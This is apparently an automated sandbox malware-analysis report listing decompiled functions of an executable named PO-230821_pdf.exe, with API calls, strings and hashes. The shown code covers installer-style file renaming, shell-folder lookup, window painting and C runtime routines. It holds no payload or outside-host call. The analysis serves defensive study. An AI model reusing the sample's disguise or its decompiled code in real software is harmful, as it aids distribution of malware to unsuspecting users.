									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00406158(_t44, 0, 1));
					_t12 = GetShortPathNameW(_t44, 0x426de8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}

0x004062ae
0x004062b7
0x004062be
0x004062c8
0x004062dc
0x00406304
0x0040630b
0x0040630f
0x00406313
0x00406333
0x0040633a
0x00406344
0x00406351
0x00406356
0x0040635b
0x0040635f
0x0040636e
0x00406370
0x0040637d
0x00406381
0x0040641c
0x00000000
0x00406397
0x004063a4
0x004063c8
0x004063cc
0x004063eb
0x004063ef
0x004063ef
0x004063f1
0x004063fa
0x00406405
0x00406410
0x00406416
0x00000000
0x00406416
0x004063ce
0x004063d1
0x004063dc
0x004063d8
0x004063da
0x004063db
0x004063db
0x004063e3
0x004063e5
0x00000000
0x004063e5
0x004063af
0x004063b5
0x00000000
0x004063b5
0x00406381
0x0040635f
0x004062de
0x004062e9
0x004062f2
0x004062f6
0x00000000
0x00000000
0x004062f6
0x00406427

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406449,?,?), ref: 004062E9
GetShortPathNameW.KERNEL32(?,00426DE8,00000400), ref: 004062F2

Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF

GetShortPathNameW.KERNEL32(?,004275E8,00000400), ref: 0040630F
wsprintfA.USER32 ref: 0040632D
GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?,?,?,?,?), ref: 00406368
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406377
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063AF
SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 00406405
GlobalFree.KERNEL32(00000000), ref: 00406416
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040641D

Part of subcall function 00406158: GetFileAttributesW.KERNEL32(00000003,00403113,C:\Users\user\Desktop\PO-230821_pdf.exe,80000000,00000003), ref: 0040615C
Part of subcall function 00406158: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E

Strings

uB, xrefs: 00406304
%ls=%ls, xrefs: 00406323
mB, xrefs: 004062D7
uB, xrefs: 0040630B
[Rename], xrefs: 00406397, 004063A9

Memory Dump Source

Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]$mB$uB$uB
API String ID: 2171350718-2295842750
Opcode ID: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
Instruction ID: df9b4e9fb9d32bd4c250032a1d399944af7a2e4c2f0bdec2b7d3959d12e60cc8
Opcode Fuzzy Hash: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
Instruction Fuzzy Hash: B8314331200315BBD2206B619D49F5B3AACEF85704F16003BFD02FA2C2EA7DD82186BD

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42a270;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x429260, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42a268;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}

0x0040100a
0x00401039
0x00401047
0x0040104d
0x00401051
0x0040105b
0x00401061
0x00401064
0x004010f3
0x00401089
0x0040108c
0x004010a6
0x004010bd
0x004010cc
0x004010cf
0x004010d5
0x004010d9
0x004010e4
0x004010ed
0x004010ef
0x004010ef
0x00401100
0x00401105
0x0040110d
0x00401110
0x00401112
0x00401118
0x0040111f
0x00401126
0x00401130
0x00401142
0x00401156
0x00401160
0x00401165
0x00401165
0x00401110
0x0040116e
0x00000000
0x00401178
0x00401010
0x00401013
0x00401015
0x0040101f
0x0040101f
0x00000000

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
Instruction ID: e2f9fea5dfd6f059ba8eeb08e8d10ac227d01a2162b8a260283931f50cd0bfbf
Opcode Fuzzy Hash: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
Instruction Fuzzy Hash: 33418B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0C7349A55DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 10001B02 Relevance: 19.6, APIs: 13, Instructions: 81
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 78%

			E10001B02(void* __eax, void* __ebx) {
				intOrPtr _t5;
				intOrPtr _t6;
				intOrPtr _t7;
				LONG* _t8;
				void* _t9;
				void* _t14;
				void* _t24;
				intOrPtr* _t25;
				intOrPtr* _t26;

				_t14 = __ebx;
				__imp__DecodePointer( *0x1000dc88);
				_t25 =  *0x1000bee0; // 0x0
				_t24 = __eax;
				if(_t25 != 0) {
					while( *_t25 != 0) {
						E10002511( *_t25);
						_t25 = _t25 + 4;
						if(_t25 != 0) {
							continue;
						}
						break;
					}
					_t25 =  *0x1000bee0; // 0x0
				}
				_push(_t14);
				E10002511(_t25);
				_t26 =  *0x1000bedc; // 0x0
				 *0x1000bee0 = 0;
				if(_t26 != 0) {
					while( *_t26 != 0) {
						E10002511( *_t26);
						_t26 = _t26 + 4;
						if(_t26 != 0) {
							continue;
						}
						break;
					}
					_t26 =  *0x1000bedc; // 0x0
				}
				E10002511(_t26);
				 *0x1000bedc = 0;
				E10002511( *0x1000bed8);
				_t5 = E10002511( *0x1000bed4);
				 *0x1000bed8 = 0;
				 *0x1000bed4 = 0;
				if(_t24 != 0xffffffff) {
					_t5 = E10002511(_t24);
				}
				__imp__EncodePointer(0);
				 *0x1000dc88 = _t5;
				_t6 =  *0x1000c7dc; // 0x0
				if(_t6 != 0) {
					E10002511(_t6);
					 *0x1000c7dc = 0;
				}
				_t7 =  *0x1000c7e0; // 0x0
				if(_t7 != 0) {
					E10002511(_t7);
					 *0x1000c7e0 = 0;
				}
				_t8 = InterlockedDecrement( *0x1000b4c4);
				if(_t8 == 0) {
					_t8 =  *0x1000b4c4; // 0x1000b7c0
					if(_t8 != 0x1000b7c0) {
						_t9 = E10002511(_t8);
						 *0x1000b4c4 = 0x1000b7c0;
						return _t9;
					}
				}
				return _t8;
			}

0x10001b02
0x10001b0a
0x10001b10
0x10001b16
0x10001b1a
0x10001b1c
0x10001b23
0x10001b29
0x10001b2c
0x00000000
0x00000000
0x00000000
0x10001b2c
0x10001b2e
0x10001b2e
0x10001b34
0x10001b36
0x10001b3b
0x10001b44
0x10001b4c
0x10001b4e
0x10001b54
0x10001b5a
0x10001b5d
0x00000000
0x00000000
0x00000000
0x10001b5d
0x10001b5f
0x10001b5f
0x10001b66
0x10001b71
0x10001b77
0x10001b82
0x10001b8a
0x10001b90
0x10001b99
0x10001b9c
0x10001ba1
0x10001ba3
0x10001ba9
0x10001bae
0x10001bb5
0x10001bb8
0x10001bbe
0x10001bbe
0x10001bc4
0x10001bcb
0x10001bce
0x10001bd4
0x10001bd4
0x10001be0
0x10001be9
0x10001beb
0x10001bf7
0x10001bfa
0x10001c00
0x00000000
0x10001c00
0x10001bf7
0x10001c08

APIs

DecodePointer.KERNEL32(?,00000001,100013FE,10009AB0,00000008,10001535,?,00000001,?,10009AD0,0000000C,100014D4,?,00000001,?), ref: 10001B0A
_free.LIBCMT ref: 10001B23

Part of subcall function 10002511: HeapFree.KERNEL32(00000000,00000000,?,1000196C,00000000,?,?,?,?,?,10002AFE,00000018,10009B80,00000008,10002A4C,?), ref: 10002525
Part of subcall function 10002511: GetLastError.KERNEL32(00000000,?,1000196C,00000000,?,?,?,?,?,10002AFE,00000018,10009B80,00000008,10002A4C,?,?), ref: 10002537

_free.LIBCMT ref: 10001B36
_free.LIBCMT ref: 10001B54
_free.LIBCMT ref: 10001B66
_free.LIBCMT ref: 10001B77
_free.LIBCMT ref: 10001B82
_free.LIBCMT ref: 10001B9C
EncodePointer.KERNEL32(00000000), ref: 10001BA3
_free.LIBCMT ref: 10001BB8
_free.LIBCMT ref: 10001BCE
InterlockedDecrement.KERNEL32 ref: 10001BE0
_free.LIBCMT ref: 10001BFA

Memory Dump Source

Source File: 00000000.00000002.1090537382.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1090439224.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1090718211.0000000010008000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1090787426.000000001000B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1090909986.000000001000E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_PO-230821_pdf.jbxd

Similarity

API ID: _free$Pointer$DecodeDecrementEncodeErrorFreeHeapInterlockedLast
String ID:
API String ID: 4264854383-0
Opcode ID: a02bd7c47bf02372d776e0292fe4aed2ec27893ba39b7060528d04548340d720
Instruction ID: ddbd43b9dfdbde684fc43420aedc0cf5c50bb6f1134a6dfe5db267dea2a7c236
Opcode Fuzzy Hash: a02bd7c47bf02372d776e0292fe4aed2ec27893ba39b7060528d04548340d720
Instruction Fuzzy Hash: E221CC36900E709FF741DF24DCD1A893BA4FB043E1311406AEA08933AEEBB0AD50CB54

Uniqueness

Uniqueness Score: -1.00%

Function 004066A5 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 196
stringCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E004066A5(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
				struct _ITEMIDLIST* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t44;
				WCHAR* _t45;
				signed char _t47;
				signed int _t48;
				short _t59;
				short _t61;
				short _t63;
				void* _t71;
				signed int _t77;
				signed int _t78;
				short _t81;
				short _t82;
				signed char _t84;
				signed int _t85;
				void* _t98;
				void* _t104;
				intOrPtr* _t105;
				void* _t107;
				WCHAR* _t108;
				void* _t110;

				_t107 = __esi;
				_t104 = __edi;
				_t71 = __ebx;
				_t44 = _a8;
				if(_t44 < 0) {
					_t44 =  *( *0x42923c - 4 + _t44 * 4);
				}
				_push(_t71);
				_push(_t107);
				_push(_t104);
				_t105 =  *0x42a298 + _t44 * 2;
				_t45 = 0x428200;
				_t108 = 0x428200;
				if(_a4 >= 0x428200 && _a4 - 0x428200 >> 1 < 0x800) {
					_t108 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				_t81 =  *_t105;
				_a8 = _t81;
				if(_t81 == 0) {
					L43:
					 *_t108 =  *_t108 & 0x00000000;
					if(_a4 == 0) {
						return _t45;
					}
					return E00406668(_a4, _t45);
				} else {
					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
						_t98 = 2;
						_t105 = _t105 + _t98;
						if(_t81 >= 4) {
							if(__eflags != 0) {
								 *_t108 = _t81;
								_t108 = _t108 + _t98;
								__eflags = _t108;
							} else {
								 *_t108 =  *_t105;
								_t108 = _t108 + _t98;
								_t105 = _t105 + _t98;
							}
							L42:
							_t82 =  *_t105;
							_a8 = _t82;
							if(_t82 != 0) {
								_t81 = _a8;
								continue;
							}
							goto L43;
						}
						_t84 =  *((intOrPtr*)(_t105 + 1));
						_t47 =  *_t105;
						_t48 = _t47 & 0x000000ff;
						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
						_t85 = _t84 & 0x000000ff;
						_v28 = _t48 | 0x00008000;
						_t77 = 2;
						_v16 = _t85;
						_t105 = _t105 + _t77;
						_v24 = _t48;
						_v20 = _t85 | 0x00008000;
						if(_a8 != _t77) {
							__eflags = _a8 - 3;
							if(_a8 != 3) {
								__eflags = _a8 - 1;
								if(__eflags == 0) {
									__eflags = (_t48 | 0xffffffff) - _v12;
									E004066A5(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
								}
								L38:
								_t108 =  &(_t108[lstrlenW(_t108)]);
								_t45 = 0x428200;
								goto L42;
							}
							_t78 = _v12;
							__eflags = _t78 - 0x1d;
							if(_t78 != 0x1d) {
								__eflags = (_t78 << 0xb) + 0x42b000;
								E00406668(_t108, (_t78 << 0xb) + 0x42b000);
							} else {
								E004065AF(_t108,  *0x42a268);
							}
							__eflags = _t78 + 0xffffffeb - 7;
							if(__eflags < 0) {
								L29:
								E004068EF(_t108);
							}
							goto L38;
						}
						if( *0x42a2e4 != 0) {
							_t77 = 4;
						}
						_t121 = _t48;
						if(_t48 >= 0) {
							__eflags = _t48 - 0x25;
							if(_t48 != 0x25) {
								__eflags = _t48 - 0x24;
								if(_t48 == 0x24) {
									GetWindowsDirectoryW(_t108, 0x400);
									_t77 = 0;
								}
								while(1) {
									__eflags = _t77;
									if(_t77 == 0) {
										goto L26;
									}
									_t59 =  *0x42a264;
									_t77 = _t77 - 1;
									__eflags = _t59;
									if(_t59 == 0) {
										L22:
										_t61 = SHGetSpecialFolderLocation( *0x42a268,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
										__eflags = _t61;
										if(_t61 != 0) {
											L24:
											 *_t108 =  *_t108 & 0x00000000;
											__eflags =  *_t108;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v8, _t108);
										_a8 = _t61;
										__imp__CoTaskMemFree(_v8);
										__eflags = _a8;
										if(_a8 != 0) {
											goto L26;
										}
										goto L24;
									}
									_t63 =  *_t59( *0x42a268,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
									__eflags = _t63;
									if(_t63 == 0) {
										goto L26;
									}
									goto L22;
								}
								goto L26;
							}
							GetSystemDirectoryW(_t108, 0x400);
							goto L26;
						} else {
							E00406536( *0x42a298, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a298 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
							if( *_t108 != 0) {
								L27:
								if(_v16 == 0x1a) {
									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L29;
							}
							E004066A5(_t77, _t105, _t108, _t108, _v16);
							L26:
							if( *_t108 == 0) {
								goto L29;
							}
							goto L27;
						}
					}
					goto L43;
				}
			}

0x004066a5
0x004066a5
0x004066a5
0x004066ab
0x004066b0
0x004066c1
0x004066c1
0x004066c9
0x004066ca
0x004066cb
0x004066cc
0x004066cf
0x004066d7
0x004066d9
0x004066ea
0x004066ed
0x004066ed
0x004066f1
0x004066f7
0x004066fa
0x004068d5
0x004068d5
0x004068e0
0x004068ec
0x004068ec
0x00000000
0x00406700
0x00406705
0x0040671a
0x0040671b
0x00406721
0x004068b3
0x004068c1
0x004068c4
0x004068c4
0x004068b5
0x004068b8
0x004068bb
0x004068bd
0x004068bd
0x004068c6
0x004068c6
0x004068cc
0x004068cf
0x00406702
0x00000000
0x00406702
0x00000000
0x004068cf
0x00406727
0x0040672a
0x00406739
0x00406740
0x0040674c
0x0040674f
0x00406752
0x00406753
0x00406758
0x0040675e
0x00406761
0x00406764
0x00406857
0x0040685c
0x0040688f
0x00406894
0x00406899
0x0040689e
0x0040689e
0x004068a3
0x004068a9
0x004068ac
0x00000000
0x004068ac
0x0040685e
0x00406861
0x00406864
0x00406879
0x00406880
0x00406866
0x0040686d
0x0040686d
0x00406888
0x0040688b
0x0040684f
0x00406850
0x00406850
0x00000000
0x0040688b
0x00406771
0x00406775
0x00406775
0x00406776
0x00406778
0x004067b5
0x004067b8
0x004067c8
0x004067cb
0x004067d3
0x004067d9
0x004067d9
0x00406834
0x00406834
0x00406836
0x00000000
0x00000000
0x004067dd
0x004067e2
0x004067e3
0x004067e5
0x004067fc
0x0040680a
0x00406810
0x00406812
0x00406830
0x00406830
0x00406830
0x00000000
0x00406830
0x00406818
0x00406821
0x00406824
0x0040682a
0x0040682e
0x00000000
0x00000000
0x00000000
0x0040682e
0x004067f6
0x004067f8
0x004067fa
0x00000000
0x00000000
0x00000000
0x004067fa
0x00000000
0x00406834
0x004067c0
0x00000000
0x0040677a
0x00406798
0x004067a1
0x0040683e
0x00406842
0x0040684a
0x0040684a
0x00000000
0x00406842
0x004067ab
0x00406838
0x0040683c
0x00000000
0x00000000
0x00000000
0x0040683c
0x00406778
0x00000000
0x00406705

APIs

GetSystemDirectoryW.KERNEL32(Fosklcks,00000400), ref: 004067C0
GetWindowsDirectoryW.KERNEL32(Fosklcks,00000400,00000000,00422728,?,00405701,00422728,00000000,00000000,00000000,00000000), ref: 004067D3
lstrcatW.KERNEL32(Fosklcks,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
lstrlenW.KERNEL32(Fosklcks,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4

Strings

Fosklcks, xrefs: 004066CF, 00406782, 00406789, 0040678D, 004067AA, 004067BF, 004067D2, 004067E7, 00406814, 00406849, 0040684F, 0040686C, 0040687F, 0040689D, 004068A3, 004068AC, 004068E2
Software\Microsoft\Windows\CurrentVersion, xrefs: 0040678E
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406844

Memory Dump Source

Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd

Similarity

API ID: Directory$SystemWindowslstrcatlstrlen
String ID: Fosklcks$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 4260037668-1365280483
Opcode ID: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
Instruction ID: 414c90a3e727c3679fd522760d05a71ccfd37451a898d0680c6fb4b4ce958948
Opcode Fuzzy Hash: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
Instruction Fuzzy Hash: CD61E172A02115EBDB20AF64CD40BAA37A5EF10314F22C13EE946B62D0DB3D49A1CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 10001EE4 Relevance: 16.7, APIs: 11, Instructions: 229
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E10001EE4(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t81;
				void* _t86;
				long _t90;
				intOrPtr _t94;
				signed int _t98;
				signed int _t99;
				signed char _t103;
				intOrPtr* _t105;
				intOrPtr _t106;
				intOrPtr* _t109;
				signed char _t111;
				long _t119;
				signed int _t130;
				signed int* _t134;
				intOrPtr _t135;
				signed int* _t138;
				void** _t139;
				intOrPtr _t141;
				void* _t142;
				signed int _t143;
				void** _t147;
				signed int _t149;
				void* _t150;
				void** _t154;
				void* _t155;

				_push(0x64);
				_push(0x10009b60);
				E10002840(__ebx, __edi, __esi);
				E10002A35(0xb);
				_t130 = 0;
				 *(_t155 - 4) = 0;
				if( *0x1000db80 == 0) {
					_push(0x40);
					_t141 = 0x20;
					_push(_t141);
					_t81 = E10002720();
					_t134 = _t81;
					 *(_t155 - 0x24) = _t134;
					if(_t134 != 0) {
						 *0x1000db80 = _t81;
						 *0x1000db64 = _t141;
						while(_t134 <  &(_t81[0x200])) {
							_t134[1] = 0xa00;
							 *_t134 =  *_t134 | 0xffffffff;
							_t134[2] = _t130;
							_t134[9] = _t134[9] & 0x00000080;
							_t134[9] = _t134[9] & 0x0000007f;
							_t134[9] = 0xa0a;
							_t134[0xe] = _t130;
							_t134[0xd] = _t130;
							_t134 =  &(_t134[0x10]);
							 *(_t155 - 0x24) = _t134;
							_t81 =  *0x1000db80;
						}
						GetStartupInfoW(_t155 - 0x74);
						if( *((short*)(_t155 - 0x42)) == 0) {
							while(1) {
								L31:
								 *(_t155 - 0x2c) = _t130;
								if(_t130 >= 3) {
									break;
								}
								_t147 =  *0x1000db80 + (_t130 << 6);
								 *(_t155 - 0x24) = _t147;
								if( *_t147 == 0xffffffff ||  *_t147 == 0xfffffffe) {
									_t147[1] = 0x81;
									if(_t130 != 0) {
										_t66 = _t130 - 1; // -1
										asm("sbb eax, eax");
										_t90 =  ~_t66 + 0xfffffff5;
									} else {
										_t90 = 0xfffffff6;
									}
									_t142 = GetStdHandle(_t90);
									if(_t142 == 0xffffffff || _t142 == 0) {
										L47:
										_t147[1] = _t147[1] | 0x00000040;
										 *_t147 = 0xfffffffe;
										_t94 =  *0x1000cb40; // 0x0
										if(_t94 != 0) {
											 *( *((intOrPtr*)(_t94 + _t130 * 4)) + 0x10) = 0xfffffffe;
										}
										goto L49;
									} else {
										_t98 = GetFileType(_t142);
										if(_t98 == 0) {
											goto L47;
										}
										 *_t147 = _t142;
										_t99 = _t98 & 0x000000ff;
										if(_t99 != 2) {
											if(_t99 != 3) {
												L46:
												_t70 =  &(_t147[3]); // -268491636
												InitializeCriticalSectionAndSpinCount(_t70, 0xfa0);
												_t147[2] = _t147[2] + 1;
												goto L49;
											}
											_t103 = _t147[1] | 0x00000008;
											L45:
											_t147[1] = _t103;
											goto L46;
										}
										_t103 = _t147[1] | 0x00000040;
										goto L45;
									}
								} else {
									_t147[1] = _t147[1] | 0x00000080;
									L49:
									_t130 = _t130 + 1;
									continue;
								}
							}
							 *(_t155 - 4) = 0xfffffffe;
							E100021A8();
							L2:
							_t86 = 1;
							L3:
							return E10002885(_t86);
						}
						_t105 =  *((intOrPtr*)(_t155 - 0x40));
						if(_t105 == 0) {
							goto L31;
						}
						_t135 =  *_t105;
						 *((intOrPtr*)(_t155 - 0x1c)) = _t135;
						_t106 = _t105 + 4;
						 *((intOrPtr*)(_t155 - 0x28)) = _t106;
						 *(_t155 - 0x20) = _t106 + _t135;
						if(_t135 >= 0x800) {
							_t135 = 0x800;
							 *((intOrPtr*)(_t155 - 0x1c)) = 0x800;
						}
						_t149 = 1;
						 *(_t155 - 0x30) = 1;
						while( *0x1000db64 < _t135) {
							_t138 = E10002720(_t141, 0x40);
							 *(_t155 - 0x24) = _t138;
							if(_t138 != 0) {
								0x1000db80[_t149] = _t138;
								 *0x1000db64 =  *0x1000db64 + _t141;
								while(_t138 <  &(0x1000db80[_t149][0x200])) {
									_t138[1] = 0xa00;
									 *_t138 =  *_t138 | 0xffffffff;
									_t138[2] = _t130;
									_t138[9] = _t138[9] & 0x00000080;
									_t138[9] = 0xa0a;
									_t138[0xe] = _t130;
									_t138[0xd] = _t130;
									_t138 =  &(_t138[0x10]);
									 *(_t155 - 0x24) = _t138;
								}
								_t149 = _t149 + 1;
								 *(_t155 - 0x30) = _t149;
								_t135 =  *((intOrPtr*)(_t155 - 0x1c));
								continue;
							}
							_t135 =  *0x1000db64;
							 *((intOrPtr*)(_t155 - 0x1c)) = _t135;
							break;
						}
						_t143 = _t130;
						 *(_t155 - 0x2c) = _t143;
						_t109 =  *((intOrPtr*)(_t155 - 0x28));
						_t139 =  *(_t155 - 0x20);
						while(_t143 < _t135) {
							_t150 =  *_t139;
							if(_t150 == 0xffffffff || _t150 == 0xfffffffe) {
								L26:
								_t143 = _t143 + 1;
								 *(_t155 - 0x2c) = _t143;
								_t109 =  *((intOrPtr*)(_t155 - 0x28)) + 1;
								 *((intOrPtr*)(_t155 - 0x28)) = _t109;
								_t139 =  &(_t139[1]);
								 *(_t155 - 0x20) = _t139;
								continue;
							} else {
								_t111 =  *_t109;
								if((_t111 & 0x00000001) == 0) {
									goto L26;
								}
								if((_t111 & 0x00000008) != 0) {
									L24:
									_t154 = 0x1000db80[_t143 >> 5] + ((_t143 & 0x0000001f) << 6);
									 *(_t155 - 0x24) = _t154;
									 *_t154 =  *_t139;
									_t154[1] =  *((intOrPtr*)( *((intOrPtr*)(_t155 - 0x28))));
									_t38 =  &(_t154[3]); // 0xd
									InitializeCriticalSectionAndSpinCount(_t38, 0xfa0);
									_t154[2] = _t154[2] + 1;
									_t139 =  *(_t155 - 0x20);
									L25:
									_t135 =  *((intOrPtr*)(_t155 - 0x1c));
									goto L26;
								}
								_t119 = GetFileType(_t150);
								_t139 =  *(_t155 - 0x20);
								if(_t119 == 0) {
									goto L25;
								}
								goto L24;
							}
						}
						goto L31;
					}
